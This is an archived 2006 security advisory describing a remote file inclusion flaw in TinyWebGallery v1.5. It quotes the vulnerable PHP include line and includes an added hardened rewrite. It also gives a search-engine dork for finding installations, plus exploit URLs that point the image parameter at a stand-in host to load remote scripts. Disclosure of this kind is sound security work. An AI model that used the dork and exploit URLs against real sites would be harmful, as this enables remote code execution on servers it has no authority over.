TinyWebGallery v1.5 ( image ) Remote Include Vulnerability

2006-08-11T00:00:00
ID SECURITYVULNS:DOC:13864
Type securityvulns
Reporter Securityvulns
Modified 2006-08-11T00:00:00

Description

C Y B E R - W A R R i O R TIM

TinyWebGallery v1.5 ( image ) Remote Include Vulnerability

------------------------------------------------------------------------

Author: xoron

------------------------------------------------------------------------

Script: TinyWebGallery

------------------------------------------------------------------------

Class: Remote

------------------------------------------------------------------------

cont@ct: x0r0n[at]hotmail[dot]com

------------------------------------------------------------------------

CODE:

<?php

include ($image . ".txt");

?>
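A hardened counterpart to the `include` above, as an added example that is not part of the original advisory and is not TinyWebGallery's own code or fix. It assumes the `.txt` files are plain-text data kept in one directory; `TEXT_DIR` and `resolve_text_file()` are hypothetical names.

```php
<?php
// Added illustration, not TinyWebGallery code. TEXT_DIR and
// resolve_text_file() are hypothetical names; the directory is an assumption.
declare(strict_types=1);

const TEXT_DIR = __DIR__ . '/texts';   // assumed location of the .txt files

/**
 * Map a user-supplied name to a .txt file inside $baseDir.
 * Returns the absolute path, or null if the name is not acceptable.
 */
function resolve_text_file(string $name, string $baseDir = TEXT_DIR): ?string
{
    // 1. Strict allowlist: no URL scheme, slash, dot or NUL byte can pass.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    // 2. Resolve symlinks and confirm the result is really under the base dir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.txt');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly rather than from an implicitly set global.
$image = $_GET['image'] ?? '';
$path  = is_string($image) ? resolve_text_file($image) : null;
if ($path === null) {
    http_response_code(400);
    exit('Invalid image name');
}

$text = file_get_contents($path);
if ($text === false) {
    http_response_code(500);
    exit('Unable to read file');
}
// The file is data, not code: read and escape it, never include() it.
echo htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
```

At the server level, `allow_url_include = Off` in `php.ini` stops `include` from fetching URL wrappers at all, which limits this class of bug even where a code path like the original remains.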

------------------------------------------------------------------------

google dork: "powered by twg"

------------------------------------------------------------------------

Exploit:

http://www.site.com/[path]/examples/image.php?image=http://evil_scripts

http://www.site.com/[path]/examples/examples/image.php2?image=http://evil_scripts?

Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends